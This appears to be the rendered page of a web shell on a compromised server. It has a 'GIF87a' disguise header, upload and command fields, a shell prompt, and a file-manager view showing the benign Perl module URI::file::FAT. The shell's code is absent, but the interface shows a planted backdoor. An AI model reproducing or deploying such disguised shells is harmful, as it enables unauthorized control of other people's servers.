GIF87a; 404

MY HEART




Upload:

Command:

diavoloapp@18.117.186.60: ~ $
package URI::file::FAT;

use strict;
use warnings;

use parent 'URI::file::Win32';

our $VERSION = '1.76';

sub fix_path
{
    shift; # class
    for (@_) {
	# turn it into 8.3 names
	my @p = map uc, split(/\./, $_, -1);
	return if @p > 2;     # more than 1 dot is not allowed
	@p = ("") unless @p;  # split bug? (returns nothing when splitting "")
	$_ = substr($p[0], 0, 8);
        if (@p > 1) {
	    my $ext = substr($p[1], 0, 3);
	    $_ .= ".$ext" if length $ext;
	}
    }
    1;  # ok
}

1;

Filemanager

Name Type Size Permission Actions
Base.pm File 1.45 KB 0444
FAT.pm File 497 B 0444
Mac.pm File 2.43 KB 0444
OS2.pm File 561 B 0444
QNX.pm File 337 B 0444
Unix.pm File 1022 B 0444
Win32.pm File 1.72 KB 0444